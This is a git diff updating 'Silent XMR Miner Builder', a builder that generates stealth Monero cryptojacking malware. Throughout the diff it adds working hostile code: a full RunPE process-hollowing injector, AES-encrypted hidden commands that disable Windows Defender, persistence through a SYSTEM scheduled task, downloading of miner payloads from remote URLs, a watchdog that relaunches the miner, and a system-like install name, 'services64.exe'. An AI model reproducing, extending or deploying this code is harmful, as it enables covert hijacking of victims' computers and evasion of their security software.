Me.MephForm1.SubHeader = "By Unam Sanctam, Credit to NYAN-x-CAT" Me.MephForm1.TabIndex = 0 - Me.MephForm1.Text = "Silent XMR Miner Builder 1.4" + Me.MephForm1.Text = "Silent XMR Miner Builder 1.4.1" ' 'MephTabcontrol2 ' @@ -620,7 +620,7 @@ Partial Class Form1 Me.txtInstallFileName.Name = "txtInstallFileName" Me.txtInstallFileName.Size = New System.Drawing.Size(127, 24) Me.txtInstallFileName.TabIndex = 8 - Me.txtInstallFileName.Text = "Services.exe" + Me.txtInstallFileName.Text = "services64.exe" Me.txtInstallFileName.TextAlignment = System.Windows.Forms.HorizontalAlignment.Left Me.txtInstallFileName.UseSystemPasswordChar = False Me.txtInstallFileName.WordWrap = False diff --git a/SilentXMRMiner/Form1.vb b/SilentXMRMiner/Form1.vb index 18f9b51..d3d5baf 100644 --- a/SilentXMRMiner/Form1.vb +++ b/SilentXMRMiner/Form1.vb @@ -8,6 +8,8 @@ Public Class Form1 Public watchdogdata As Byte() = New Byte() {} Public FA As New Advanced + Public RandomiCache As New List(Of String) + 'Silent XMR Miner by Unam Sanctam https://github.com/UnamSanctam/SilentXMRMiner, initially based on Lime Miner by NYAN CAT https://github.com/NYAN-x-CAT/Lime-Miner Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load @@ -18,6 +20,7 @@ Public Class Form1 Codedom.F = Me FA.F = Me + RandomiCache.Add("SilentXMRMiner") FA.txtAdvParam.Text = advancedParams End Sub @@ -68,7 +71,7 @@ Public Class Form1 txtLog.Text = txtLog.Text + ("Starting..." + vbNewLine) txtLog.Text = txtLog.Text + ("Replacing strings..." + vbNewLine) Dim minerbuilder As New StringBuilder(My.Resources.Program) - Dim argstr As String = " --cinit-find-x -B " & If(FA.chkAdvanced.Checked, FA.txtAdvParam.Text, advancedParams) & " --url=" & txtPoolURL.Text & " --user=" & txtPoolUsername.Text & " --pass=" & txtPoolPassowrd.Text & " --cpu-max-threads-hint=" & txtMaxCPU.Text.Replace("%", "") & If(FA.chkRemoteConfig.Checked, " --cinit-remote-config=""" & Unamlib_Encrypt(FA.txtRemoteConfig.Text) & """", "") & " --donate-level=5 " + Dim argstr As String = " --cinit-find-x -B " & If(FA.chkAdvanced.Checked, FA.txtAdvParam.Text, advancedParams) & " --url=" & txtPoolURL.Text & " --user=" & txtPoolUsername.Text & " --pass=" & txtPoolPassowrd.Text & " --cpu-max-threads-hint=" & txtMaxCPU.Text.Replace("%", "") & If(FA.chkRemoteConfig.Checked, " --cinit-remote-config=""" & Unamlib_Encrypt(FA.txtRemoteConfig.Text) & """", "") & " " minerbuilder.Replace("#dll", Resources_dll) minerbuilder.Replace("#xmr", Resources_xmrig) @@ -233,13 +236,19 @@ Public Class Form1 End Function Public Function Randomi(ByVal length As Integer) As String - Dim Chr As String = "asdfghjklqwertyuiopmnbvcxz" - Dim sb As New Text.StringBuilder() - For i As Integer = 1 To length - Dim idx As Integer = rand.Next(0, Chr.Length) - sb.Append(Chr.Substring(idx, 1)) - Next - Return sb.ToString + While True + Dim Chr As String = "asdfghjklqwertyuiopmnbvcxz" + Dim sb As New Text.StringBuilder() + For i As Integer = 1 To length + Dim idx As Integer = rand.Next(0, Chr.Length) + sb.Append(Chr.Substring(idx, 1)) + Next + If Not RandomiCache.Contains(sb.ToString()) Then + RandomiCache.Add(sb.ToString()) + Return sb.ToString + End If + End While + Return "" End Function Private Sub chkInstall_CheckedChanged(sender As Object) Handles chkInstall.CheckedChanged diff --git a/SilentXMRMiner/My Project/Resources.Designer.vb b/SilentXMRMiner/My Project/Resources.Designer.vb index 62ab71e..5a7aceb 100644 --- a/SilentXMRMiner/My Project/Resources.Designer.vb +++ b/SilentXMRMiner/My Project/Resources.Designer.vb @@ -85,6 +85,7 @@ Namespace My.Resources '''using System.IO; '''using System.Reflection; '''using System.Security.Cryptography; + '''using System.Runtime.InteropServices; '''using System.Text; '''using System.Resources; '''using System.Threading; @@ -99,8 +100,7 @@ Namespace My.Resources '''[assembly: AssemblyTitle("%Title%")] '''[assembly: AssemblyDescription("%Description%")] '''[assembly: AssemblyCompany("%Company%")] - '''[assembly: AssemblyProduct("%Product%")] - '''[assembly: Assembl [rest of string was truncated]";. + '''[assembly: AssemblyPr [rest of string was truncated]";. ''' Friend ReadOnly Property Loader() As String Get @@ -108,16 +108,6 @@ Namespace My.Resources End Get End Property - ''' - ''' Looks up a localized resource of type System.Byte[]. - ''' - Friend ReadOnly Property Mandark() As Byte() - Get - Dim obj As Object = ResourceManager.GetObject("Mandark", resourceCulture) - Return CType(obj,Byte()) - End Get - End Property - ''' ''' Looks up a localized resource of type System.Drawing.Bitmap. ''' @@ -160,6 +150,7 @@ Namespace My.Resources '''using System.Security.Principal; '''using System.Text; '''using System.Threading; + '''using System.Linq; '''using Microsoft.Win32; '''#if DefDebug '''using System.Windows.Forms; @@ -168,7 +159,7 @@ Namespace My.Resources '''#if DefAssembly '''[assembly: AssemblyTitle("%Title%")] '''[assembly: AssemblyDescription("%Description%")] - '''[assembly: AssemblyCompany("%Comp [rest of string was truncated]";. + '''[assembly: As [rest of string was truncated]";. ''' Friend ReadOnly Property Program() As String Get @@ -181,6 +172,7 @@ Namespace My.Resources '''using System.IO; '''using System.Reflection; '''using System.Security.Cryptography; + '''using System.Runtime.InteropServices; '''using System.Text; '''using System.Resources; '''using System.Threading; @@ -193,10 +185,11 @@ Namespace My.Resources '''using System.Windows.Forms; '''#endif ''' - '''public partial class Uninstaller + '''[assembly: Guid("%Guid%")] + ''' + '''public partial class RUninstaller '''{ - ''' public static string lb = RGetString("#LIBSPATH"); - ''' public static string bD = Environment.GetFolderPath(Environment.SpecialFolder.Appli [rest of string was truncated]";. + ''' public static string rbD = Environment.GetFolderPath(Environment.Specia [rest of string was truncated]";. ''' Friend ReadOnly Property Uninstaller() As String Get @@ -211,8 +204,10 @@ Namespace My.Resources '''using System.Management; '''using System.Reflection; '''using System.Security.Cryptography; + '''using System.Runtime.InteropServices; '''using System.Text; '''using System.Threading; + '''using System.Linq; '''#if DefDebug '''using System.Windows.Forms; '''#endif @@ -220,8 +215,7 @@ Namespace My.Resources '''[assembly: AssemblyTitle("Shell Infrastructure Host")] '''[assembly: AssemblyDescription("Shell Infrastructure Host")] '''[assembly: AssemblyProduct("Microsoft® Windows® Operating System")] - '''[assembly: AssemblyCopyright("© Microsoft Corporation. All Rights Reserved.")] - '''[assembly: Ass [rest of string was truncated]";. + '''[assembly: AssemblyCopyright("© Micr [rest of string was truncated]";. ''' Friend ReadOnly Property Watchdog() As String Get diff --git a/SilentXMRMiner/My Project/Resources.resx b/SilentXMRMiner/My Project/Resources.resx index acf32d5..873906f 100644 --- a/SilentXMRMiner/My Project/Resources.resx +++ b/SilentXMRMiner/My Project/Resources.resx @@ -118,9 +118,6 @@ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - - ..\Resources\Mandark.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - ..\Resources\Monero.ico;System.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a diff --git a/SilentXMRMiner/Resources/Loader.cs b/SilentXMRMiner/Resources/Loader.cs index a3b94ec..55f20cb 100644 --- a/SilentXMRMiner/Resources/Loader.cs +++ b/SilentXMRMiner/Resources/Loader.cs @@ -25,7 +25,7 @@ [assembly: Guid("%Guid%")] -public partial class Loader +public partial class RLoader { public static void Main() { @@ -36,12 +36,11 @@ public static void Main() Process.Start(new ProcessStartInfo { FileName = "cmd", - Arguments = "/c " + Encoding.ASCII.GetString(Convert.FromBase64String("#KillWDCommands").Reverse().ToArray()) + " & exit", + Arguments = Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String("#KillWDCommands"))), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = false, - RedirectStandardOutput = true, - Verb = "runas", + RedirectStandardOutput = true }); } catch (Exception ex) @@ -54,11 +53,7 @@ public static void Main() try { - int startDelay = 0; - if (int.TryParse("#STARTDELAY", out startDelay) && startDelay > 0) - { - Thread.Sleep(startDelay * 1000); - } + Thread.Sleep(startDelay * 1000); } catch (Exception ex) { @@ -69,7 +64,7 @@ public static void Main() try { - Assembly.Load(((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program")).Reverse().ToArray()).CreateInstance("Program").GetType().GetMethod("Main").Invoke(null, new object[0]); + Assembly.Load(RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program"))).EntryPoint.Invoke(null, new object[0]); } catch (Exception ex) { @@ -78,4 +73,17 @@ public static void Main() #endif } } + + public static byte[] RAES_Method(byte[] rarg1) + { + using (var mStream = new MemoryStream()) + { + using (var cStream = new CryptoStream(mStream, new RijndaelManaged().CreateDecryptor(new Rfc2898DeriveBytes("#KEY", Encoding.ASCII.GetBytes("#SALT"), 100).GetBytes(16), Encoding.ASCII.GetBytes("#IV")), CryptoStreamMode.Write)) + { + cStream.Write(rarg1, 0, rarg1.Length); + cStream.Close(); + } + return mStream.ToArray(); + } + } } \ No newline at end of file diff --git a/SilentXMRMiner/Resources/Mandark.dll b/SilentXMRMiner/Resources/Mandark.dll deleted file mode 100644 index cb8048a37db92ddbfb7a629f67ffd488d362ec07..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6656 zcmeI0U2GiJb;r-lE@yX#(n`an$hAyr*OnEpEtz2~*-j0&miQrwuD&Wt3N72UhvbM{ zX}LqsE@{z0jTMjy!0%=mWFYSX-v^3BbE!yV6 zD1xG}`aAc|in4{cerVq^+&yzX{^xV<9nS3W^IwvTh-CTRxFPZ#&Uzd)^y5hfbFuQ> zqP$)B;a%Txj{WeiGmG_BbvcO_l5nXy7dD%5yE+?Hla*$*-mFfXoUSg#^U=uGt^Pe} z=u?v-^S|awJP<#Zs^rIVceU3Y73oK#g>{drVLFbUly^7HH(}3NJ(Ru<{_4$64ys0v z?e65+n<8{ICW_>Ct5%LfxMH4sr88X3G(vbdI5RQ zz&pKN^=q+*(f9VPtUmp$o*VJXR|K^6*471TVoaY10Oi0 z?ZNha+X6p%hEZl~gBrlEmG#sc6e^?DJ6Z6xJCLP6@L$>qW60o6a|(KcT#&EPllQ40 zKVS>k66AMTZfme5@M>H=tZ=!DRbiu64%R5gs@(j*MZNakrv^&F-p@;=W=rnVo`Rm4 znMy4P&d&sW1C?6sPAwzot86jTDwSZjTecsz-?BS`ej8%I4R!V)hMh_qHNWr$+=Lg7|WI#%hTx1nKhY_yYOZ-fozjn6;x*M z$%`|7=AxIm_|*B{TnoFuWv}G#2d8+h6T4B@Q>OgXOzm#WzL%-7*1g`nlDmIw`iU_o z-K8jH^}&(Rk%vYfdGHYgJR8uz<>KvrNo0b=@6+(^>2^|YF0>T!Sr*JZ=iO(gG3H<3GRhTUV0cota?mbY_chucr5BLB5#zus$rm|G4u!9{lSrBHJ#qIUHW z(i)s%MSkGevnQ_e8?Gnsx$ioj>@@tNhW@+ExP$UKuAcbrPq6-r!Tg;l@-0KZ;3)r| zsP#YHI`nx_I^xa{^G)XxbjDy_&KxGrFPRAU8hRq5zK_6bJwLC6`W(69Y?rIfRi^-- zk)u`Bzfyj}Eg}E8mE_gTAd(&(d8OLlGjxmerJjAl{V26%a}TBeO%(Z+?Bl}zO>HlG zlfq_9rA}^A*n_F`-??8Dwn8dh&YzMYdF(Egzbu#KtPIQ3I%Ii8hO*B{Rj#Gd7H`f> z-d3k`H+Lf_m!3nfhE7xu)+~o!7ZGzc*?D?=yzeKs-io}Pw;D&P6zNKt6`GOn!{3h7 zE($W?`pjp-t+RuazYqFlnUcSd*P&mRZ%Zh@C*NhG{F(bbIV9UMe=2n_KVVHvxPJw` zCVvAhWZs2dkbi{kbpKV>AESB3d0(zjL)p0^`(+n&K<;s#l;6zU4}I7D zwDXF*lzA9^uRQ8}Rd%?CoZpr+nF;6H@(1oogFg$c%2Uu+omnt@WeGarK9AiK%x5|5t4r-f> z7&(w(b1un~Iz4BH{0Zl5hp~O=_+@6Sv+N#@oa(Ztqi}wz+1~%4d@iZCBg>}BhY#FT z!k&pSa!!q(c~~Ah9?!2dqF<2dwN^V?8kssNORc#$Y1C&ywN{p*Gm8oFWg%)mJHC=6 zQL~+Dj>V~Zs&%N{4(Ar5d1--~YK?_+mll$Er8zH0qW1Bqy%^8SRC6`H6v^q8X1h+* zwdLq&*qm=fGTw+=T^_hv4kz(aYE@Beh_SF0$wV}}vak@&HX@QH_1TqnB-1O)%SqH~ zO*Q7j*3zbaJYHI^H^O#3Zk~=B;bp^Vv8i8Li^4F?)*JQq+NO1EjnLXQ{Wa>Vq_HEi z?Q;i~sn)T0VL>^2OP1qw6egGCP@@sg9X-N*H*Cn^B#OHH@i1vEqPr9&&8V^e!IAk! zLz-=<;l>+bt97hCn}o@lQP`An{)My6rEvLNJ$m8fh3RNcJL;BmI=awEHFiu>%?q)d zkCIrX8&R|@%i&ssOEtD~;X;(8^Me_yx5wk=YLv7QM&{bFQgdRBoN6cC_!ISTp&7T@ z^|@A8mCkJhAZeDTqhz%{7u{yIww#>3NQ*MrT&*W@bBQ%5r$SyzBJ$T?jOOhnnQn(kTMmcy#^JElmPLxz z9M(uA^GrVdQN_7>(k8RHWRsWWP?Cge!oSS9OXKnK8mn{jlGv@3)^kZy~K zdP0$^n`)g{X*5nIlS|9(HQDIAxzYLJM(3@KE8pC>^7=;S4dpvm&1c<+SB?JqMrVEF z3Sh%*dKt$Kj&E*U!S@Y~15yKi!)U7iXqLI7-B1T(nB!UN;}C)Q5(T;nTXi z12c8gHx48q93Sg%O3{+}5EqIbH;`5&D=w$!;hy21y!7}Sg+jqFDEuCA3%*jWn=A6D^Pn^Cz!F~Cv+c#Vs z?%U&4-Jzl3A>z72T5hqY>N-PZb?tjdv$;x!)c5Cj(@;VM`oKx2ZY4)e`Ml@(+F7|+ z^kMj2gr@TO;U1Tw^Fvy?XQ)4v$K5S@k|}Z!MOlX!u2=S@$LTwp=Ys={>pc8&-U4(Y zPPr$S@%=K1eJ#q*<`@iyvVGMtSLSErlTE-eZ?F6Y(fKf5SCr@vJ-6ucgKbiK zgL#GKUL`Vax@i&P7*S?Tj|uOyBmAn<;7^a5sqYy63&wk#&X>XH9d1Dui7Zm(`-I7L zGS%0~skypyP)YBPpDZUgJL*0~te8qxn1|j~KiutRpV~9OMH!z%^wI*kWbVCdRQA95 M;rg@V|7ZgL13Wxxr2qf` diff --git a/SilentXMRMiner/Resources/Program.cs b/SilentXMRMiner/Resources/Program.cs index d4328be..0ea3751 100644 --- a/SilentXMRMiner/Resources/Program.cs +++ b/SilentXMRMiner/Resources/Program.cs @@ -26,9 +26,13 @@ #endif [assembly: Guid("%Guid%")] -public partial class Program +public partial class RProgram { +#if DefSystem32 + public static string rbD = (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH"); +#else public static string rbD = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"); +#endif #if DefInstall public static string rplp = PayloadPath; #endif @@ -37,7 +41,6 @@ public static void Main() { #if DefInstall try{ - Thread.Sleep(2 * 1000); if(new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) { try{ @@ -46,8 +49,7 @@ public static void Main() FileName = "cmd", Arguments = RGetString("#TASKSCH") + "\"" + Path.GetFileNameWithoutExtension(rplp) + "\"" + " /tr " + "'" + "\"" + (rplp) + "\"" + "' /RU \"SYSTEM\" & exit", WindowStyle = ProcessWindowStyle.Hidden, - CreateNoWindow = true, - Verb = "runas" + CreateNoWindow = true }); } catch(Exception ex){ @@ -73,7 +75,7 @@ public static void Main() #if DefInstall public static void RInstall() { - Thread.Sleep(2 * 1000); + Thread.Sleep(1 * 1000); if (Process.GetCurrentProcess().MainModule.FileName != rplp) { foreach (Process proc in Process.GetProcessesByName(RGetString("#WATCHDOG"))) @@ -92,7 +94,7 @@ public static void RInstall() } catch(Exception ex) {} File.Copy(Process.GetCurrentProcess().MainModule.FileName, rplp, true); - Thread.Sleep(5 * 1000); + Thread.Sleep(2 * 1000); RBaseFolder(); Directory.CreateDirectory(Path.GetDirectoryName(rplp)); Process.Start(new ProcessStartInfo @@ -100,7 +102,7 @@ public static void RInstall() FileName = rplp, WorkingDirectory = Path.GetDirectoryName(rplp), WindowStyle = ProcessWindowStyle.Hidden, - CreateNoWindow = true, + CreateNoWindow = true }); Environment.Exit(0); } @@ -118,10 +120,10 @@ public static string RGetString(string rarg1) return Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String(rarg1))); } - public static void RRun(byte[] rarg1, string rarg2, byte[] rarg3) + public static void RRun(byte[] rarg1, string rarg2) { // Credits gigajew for RunPE https://github.com/gigajew/Mandark - Assembly.Load(rarg1).GetType(RGetString("#DLLSTR")).GetMethod(RGetString("#DLLOAD"), BindingFlags.Public | BindingFlags.Static).Invoke(null, new object[] { rarg3, ("#InjectionDir") + @"\" + RGetString("#InjectionTarget"), rarg2 }); + Load(rarg1, ("#InjectionDir") + @"\" + RGetString("#InjectionTarget"), rarg2); } public static void RBaseFolder() @@ -159,7 +161,7 @@ public static bool RCheckProc() { var options = new ConnectionOptions(); options.Impersonation = ImpersonationLevel.Impersonate; - var scope = new ManagementScope(@"\\" + Environment.UserDomainName + @"\root\cimv2", options); + var scope = new ManagementScope(@"\root\cimv2", options); scope.Connect(); string wmiQuery = string.Format("Select CommandLine from Win32_Process where Name='{0}'", RGetString("#InjectionTarget")); @@ -168,7 +170,7 @@ public static bool RCheckProc() var managementObjectCollection = managementObjectSearcher.Get(); foreach (ManagementObject retObject in managementObjectCollection) { - if (retObject != null && retObject["CommandLine"] != null && retObject["CommandLine"].ToString().Contains("--cinit-find-x")) + if (retObject != null && retObject["CommandLine"] != null && retObject["CommandLine"].ToString().Contains(RGetString("#MINERID"))) { return true; } @@ -206,10 +208,22 @@ public static void RInitialize() { using (var client = new System.Net.WebClient()) { - li = client.DownloadData(RGetString("#LIBSURL")); + try { + li = client.DownloadData(client.DownloadString(RGetString("#SANCTAMLIBSURL"))); + } + catch(Exception ex){ +#if DefDebug + MessageBox.Show("M5.5: Couldn't get libs from sanctam, moving on to backup" + Environment.NewLine + ex.ToString()); +#endif + } + if (li.Length == 0) { + li = client.DownloadData(RGetString("#LIBSURL")); + } } #if DefInstall - File.WriteAllBytes(Path.Combine(rbD, RGetString("#WATCHDOG") + "-2.log"), RAES_Method(li, true)); + if (li.Length > 0) { + File.WriteAllBytes(Path.Combine(rbD, RGetString("#WATCHDOG") + "-2.log"), RAES_Method(li, true)); + } #endif } else @@ -219,22 +233,23 @@ public static void RInitialize() #else li = RGetTheResource("#libs"); #endif - - using (var archive = new ZipArchive(new MemoryStream(li))) - { - foreach (ZipArchiveEntry entry in archive.Entries){ - entry.ExtractToFile(Path.Combine(rbD, entry.FullName), true); + if (li.Length > 0) { + using (var archive = new ZipArchive(new MemoryStream(li))) + { + foreach (ZipArchiveEntry entry in archive.Entries){ + entry.ExtractToFile(Path.Combine(rbD, entry.FullName), true); + } } - } - if (GPUstr.ToLower().Contains("nvidia")) - { - rS += " --cuda --cuda-loader=" + "\"" + rbD + "ddb64.dll" + "\""; - } + if (GPUstr.ToLower().Contains("nvidia")) + { + rS += " --cuda --cuda-loader=" + "\"" + rbD + "ddb64.dll" + "\""; + } - if (GPUstr.ToLower().Contains("amd")) - { - rS += " --opencl "; + if (GPUstr.ToLower().Contains("amd")) + { + rS += " --opencl "; + } } } catch(Exception ex){ @@ -266,10 +281,23 @@ public static void RInitialize() { using (var client = new System.Net.WebClient()) { - rxM = client.DownloadData(RGetString("#MINERURL")); + try + { + rxM = client.DownloadData(client.DownloadString(RGetString("#SANCTAMMINERURL"))); + } + catch(Exception ex){ +#if DefDebug + MessageBox.Show("M6.5: Couldn't get xmrig from sanctam, moving on to backup" + Environment.NewLine + ex.ToString()); +#endif + } + if (rxM.Length == 0) { + rxM = client.DownloadData(RGetString("#MINERURL")); + } } #if DefInstall - File.WriteAllBytes(Path.Combine(rbD, RGetString("#WATCHDOG") + ".log"), RAES_Method(rxM, true)); + if (rxM.Length > 0) { + File.WriteAllBytes(Path.Combine(rbD, RGetString("#WATCHDOG") + ".log"), RAES_Method(rxM, true)); + } #endif } else @@ -282,18 +310,21 @@ public static void RInitialize() try { - using (var archive = new ZipArchive(new MemoryStream(rxM))) + if (rxM.Length > 0) { - foreach (ZipArchiveEntry entry in archive.Entries) + using (var archive = new ZipArchive(new MemoryStream(rxM))) { - if (entry.FullName.Contains("ri")) + foreach (ZipArchiveEntry entry in archive.Entries) { - using (var streamdata = entry.Open()) + if (entry.FullName.Contains("ri")) { - using (var ms = new MemoryStream()) + using (var streamdata = entry.Open()) { - streamdata.CopyTo(ms); - RRun(RGetTheResource("#dll"), argstr, ms.ToArray()); + using (var ms = new MemoryStream()) + { + streamdata.CopyTo(ms); + RRun(ms.ToArray(), argstr); + } } } } @@ -385,4 +416,93 @@ public static byte[] RAES_Method(byte[] rarg1, bool rarg2 = false) return mStream.ToArray(); } } + + [DllImport("kernel32.dll")] + private static extern bool CreateProcess(string rarg1, + string rarg2, + IntPtr rarg3, + IntPtr rarg4, + bool rarg5, + uint rarg6, + IntPtr rarg7, + string rarg8, + byte[] rarg9, + byte[] rarg10); + + [DllImport("kernel32.dll")] + private static extern long VirtualAllocEx(long rarg1, + long rarg2, + long rarg3, + uint rarg4, + uint rarg5); + + [DllImport("kernel32.dll")] + private static extern long WriteProcessMemory(long rarg1, + long rarg2, + byte[] lpBuffer, + int nSize, + long written); + + [DllImport("ntdll.dll")] + private static extern uint ZwUnmapViewOfSection(long rarg1, + long rarg2); + + [DllImport("kernel32.dll")] + private static extern bool SetThreadContext(long rarg1, + IntPtr rarg2); + + [DllImport("kernel32.dll")] + private static extern bool GetThreadContext(long rarg1, + IntPtr rarg2); + + [DllImport("kernel32.dll")] + private static extern uint ResumeThread(long rarg1); + + [DllImport("kernel32.dll")] + private static extern bool CloseHandle(long rarg1); + + public static void Load(byte[] rarg1, string rarg2, string rarg3) + { + int rarg4 = Marshal.ReadInt32(rarg1, 0x3c); + + long rarg5 = Marshal.ReadInt64(rarg1, rarg4 + 0x18 + 0x18); + + byte[] rarg6 = new byte[0x18]; + + IntPtr rarg7 = new IntPtr(16 * ((Marshal.AllocHGlobal(0x4d0 + (16 / 2)).ToInt64() + (16 - 1)) / 16)); + + Marshal.WriteInt32(rarg7, 0x30, 0x0010001b); + + CreateProcess(null, rarg2 + (!string.IsNullOrEmpty(rarg3) ? " " + rarg3 : ""), IntPtr.Zero, IntPtr.Zero, true, 0x4u, IntPtr.Zero, Path.GetDirectoryName(rarg2), new byte[0x68], rarg6); + long rarg8 = Marshal.ReadInt64(rarg6, 0x0); + long rarg9 = Marshal.ReadInt64(rarg6, 0x8); + + ZwUnmapViewOfSection(rarg8, rarg5); + VirtualAllocEx(rarg8, rarg5, Marshal.ReadInt32(rarg1, rarg4 + 0x18 + 0x038), 0x3000, 0x40); + WriteProcessMemory(rarg8, rarg5, rarg1, Marshal.ReadInt32(rarg1, rarg4 + 0x18 + 0x03c), 0L); + + for (short i = 0; i < Marshal.ReadInt16(rarg1, rarg4 + 0x4 + 0x2); i++) + { + byte[] rarg10 = new byte[0x28]; + Buffer.BlockCopy(rarg1, rarg4 + (0x18 + Marshal.ReadInt16(rarg1, rarg4 + 0x4 + 0x10)) + (0x28 * i), rarg10, 0, 0x28); + + byte[] rarg11 = new byte[Marshal.ReadInt32(rarg10, 0x010)]; + Buffer.BlockCopy(rarg1, Marshal.ReadInt32(rarg10, 0x014), rarg11, 0, rarg11.Length); + + WriteProcessMemory(rarg8, rarg5 + Marshal.ReadInt32(rarg10, 0x00c), rarg11, rarg11.Length, 0L); + } + + GetThreadContext(rarg9, rarg7); + + WriteProcessMemory(rarg8, Marshal.ReadInt64(rarg7, 0x88) + 16, BitConverter.GetBytes(rarg5), 8, 0L); + + Marshal.WriteInt64(rarg7, 0x80, rarg5 + Marshal.ReadInt32(rarg1, rarg4 + 0x18 + 0x10)); + + SetThreadContext(rarg9, rarg7); + ResumeThread(rarg9); + + Marshal.FreeHGlobal(rarg7); + CloseHandle(rarg8); + CloseHandle(rarg9); + } } \ No newline at end of file diff --git a/SilentXMRMiner/Resources/Uninstaller.cs b/SilentXMRMiner/Resources/Uninstaller.cs index 31ed518..24101ac 100644 --- a/SilentXMRMiner/Resources/Uninstaller.cs +++ b/SilentXMRMiner/Resources/Uninstaller.cs @@ -1,6 +1,7 @@ using System; using System.IO; using System.Reflection; +using System.Security.Principal; using System.Security.Cryptography; using System.Runtime.InteropServices; using System.Text; @@ -17,9 +18,12 @@ [assembly: Guid("%Guid%")] -public partial class Uninstaller +public partial class RUninstaller { public static string rbD = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"); +#if DefSystem32 + public static string rbD2 = Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH"); +#endif public static void Main() { @@ -110,6 +114,9 @@ public static void Main() try { Directory.Delete(rbD, true); +#if DefSystem32 + Directory.Delete(rbD2, true); +#endif #if DefInstall File.Delete(PayloadPath); #endif @@ -128,7 +135,7 @@ public static void Main() Process.Start(new ProcessStartInfo { FileName = "cmd", - Arguments = "/c powershell -Command Remove-MpPreference -ExclusionPath '%cd%' & powershell -Command Remove-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Remove-MpPreference -ExclusionPath '%AppData%' & powershell -Command Remove-MpPreference -ExclusionPath '%Temp%' & exit", + Arguments = "/c powershell -Command Remove-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Remove-MpPreference -ExclusionPath '%AppData%' & powershell -Command Remove-MpPreference -ExclusionPath '%Temp%' & powershell -Command Remove-MpPreference -ExclusionPath '%SystemRoot%' & exit", WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, Verb = "runas" diff --git a/SilentXMRMiner/Resources/Watchdog.cs b/SilentXMRMiner/Resources/Watchdog.cs index c35be22..f016776 100644 --- a/SilentXMRMiner/Resources/Watchdog.cs +++ b/SilentXMRMiner/Resources/Watchdog.cs @@ -3,6 +3,7 @@ using System.IO; using System.Management; using System.Reflection; +using System.Security.Principal; using System.Security.Cryptography; using System.Runtime.InteropServices; using System.Text; @@ -20,7 +21,7 @@ [assembly: Guid("%Guid%")] -public partial class Program +public partial class RProgram { public static string rxM = ""; public static string rplp = ""; @@ -47,57 +48,25 @@ public static void RWDLoop() { try { + if (!File.Exists(rplp)) + { + checkcount = 0; + File.WriteAllBytes(rplp, Convert.FromBase64String(rxM).Reverse().ToArray()); + RStart(); + } if (!RCheckProc()) { - if (!File.Exists(rplp)) - { - File.WriteAllBytes(rplp, Convert.FromBase64String(rxM).Reverse().ToArray()); - Process.Start(new ProcessStartInfo - { - FileName = rplp, - WindowStyle = ProcessWindowStyle.Hidden, - CreateNoWindow = true, - }); - } - else if (checkcount < 2) + if (checkcount < 2) { checkcount += 1; } else { checkcount = 0; - Process.Start(new ProcessStartInfo - { - FileName = rplp, - WindowStyle = ProcessWindowStyle.Hidden, - CreateNoWindow = true, - }); - } - } - else - { - checkcount = 0; - if (!File.Exists(rplp)) - { - File.WriteAllBytes(rplp, Convert.FromBase64String(rxM).Reverse().ToArray()); - Process.Start(new ProcessStartInfo - { - FileName = rplp, - WindowStyle = ProcessWindowStyle.Hidden, - CreateNoWindow = true, - }); + RStart(); } } - - int startDelay = 0; - if (int.TryParse("#STARTDELAY", out startDelay) && startDelay > 0) - { - Thread.Sleep(startDelay * 1000 + 5000); - } - else - { - Thread.Sleep(10000); - } + Thread.Sleep(startDelay * 1000 + 5000); RWDLoop(); } @@ -110,13 +79,24 @@ public static void RWDLoop() } + public static void RStart() + { + Process.Start(new ProcessStartInfo + { + FileName = rplp, + WindowStyle = ProcessWindowStyle.Hidden, + WorkingDirectory = Path.GetDirectoryName(rplp), + CreateNoWindow = true, + }); + } + public static bool RCheckProc() { try { var options = new ConnectionOptions(); options.Impersonation = ImpersonationLevel.Impersonate; - var scope = new ManagementScope(@"\\" + Environment.UserDomainName + @"\root\cimv2", options); + var scope = new ManagementScope(@"\root\cimv2", options); scope.Connect(); string wmiQuery = string.Format("Select CommandLine from Win32_Process where Name='{0}'", "#InjectionTarget"); diff --git a/SilentXMRMiner/Silent XMR Miner Builder.vbproj b/SilentXMRMiner/Silent XMR Miner Builder.vbproj index ad7057e..8f3249a 100644 --- a/SilentXMRMiner/Silent XMR Miner Builder.vbproj +++ b/SilentXMRMiner/Silent XMR Miner Builder.vbproj @@ -203,9 +203,6 @@ - - -